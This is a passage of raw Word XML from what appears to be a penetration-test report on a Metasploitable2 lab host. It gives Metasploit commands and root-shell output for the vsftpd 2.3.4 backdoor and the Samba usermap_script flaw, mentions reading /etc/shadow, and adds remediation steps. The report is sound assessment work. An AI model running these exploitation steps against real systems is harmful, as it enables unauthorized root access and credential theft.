              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">exploit/unix/ftp/vsftpd_234_backdoor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The FTP service on the target was running vsftpd version 2.3.4. The publicly distributed source archive for this specific version was compromised by a malicious actor to include a backdoor: when a username containing a specific trigger pattern is submitted during login, the service opens a root command shell listening on TCP port 6200. This requires no authentication and no prior access to the system.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation Steps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">search vsftpd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">use exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">set RHOSTS 172.20.10.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">set LHOST 172.20.10.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">show options</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence / Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The exploit was executed and successfully spawned the backdoor shell. A Meterpreter session was established, and command-line access confirmed root-level privileges. The compromised shell was further used to read /etc/passwd and /etc/shadow, confirming full filesystem read access at the highest privilege level.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[+] 172.20.10.3:21 - Backdoor has been spawned!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">[*] Meterpreter session 1 opened (172.20.10.4:4444 -&gt; 172.20.10.3:55072)</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shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">uid=0(root) gid=0(root)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">whoami</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4572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38475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 6.1: Metasploit console output confirming the vsftpd backdoor was spawned and root access (uid=0) was obtained.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Complete remote compromise of the host with no authentication required. An attacker gains full read/write/execute access to the system, including the ability to view all user credential hashes (/etc/shadow), modify system files, install persistent backdoors, and pivot to other hosts on the network.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remove the compromised vsftpd package immediately; reinstall from an official, verified source.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement checksum/signature verification for all downloaded software packages.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Restrict FTP service exposure to trusted networks only via firewall rules.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Disable anonymous FTP access, which was also found enabled during this assessment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">6.2 Samba “usermap_script” Command Execution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F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE-2007-2447</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVSS Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical (10.0 / 10.0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Affected Port/Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">139/TCP, 445/TCP (SMB)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Target Host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">172.20.10.3 (Metasploitable2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Exploit Module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">exploit/multi/samba/usermap_script</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The target was running Samba 3.0.20, a version vulnerable to a command injection flaw in the 'username map script' configuration option. When this option is enabled, Samba passes user-supplied usernames unsanitized into a shell command. By submitting a username containing shell metacharacters, an attacker can inject and execute arbitrary operating system commands, entirely without authentication.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation Steps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">search usermap_script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">use exploit/multi/samba/usermap_script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">show options</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">set RHOSTS 172.20.10.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence / Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The exploit successfully opened a command shell session on the target. Identity checks confirmed the session was running with full root privileges.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] Command shell session 1 opened (172.20.10.4:4444 -&gt; 172.20.10.3:56867)</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id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">uid=0(root) gid=0(root)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">whoami</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4572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38475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 6.2: Metasploit console output confirming the Samba usermap_script exploit opened a root command shell session.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Complete unauthenticated remote command execution as root. This grants an attacker the same level of access as the vsftpd finding above — full control of the host and all data it stores or processes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Upgrade Samba to a patched version (3.0.25rc4 or later).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Disable the 'username map script' option unless explicitly required for business purposes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Restrict SMB port exposure (139, 445) to trusted internal networks only.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Apply the principle of least privilege to any legacy file-sharing services still in use.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">6.3 UnrealIRCd 3.2.8.1 Backdoor Command Execution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F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
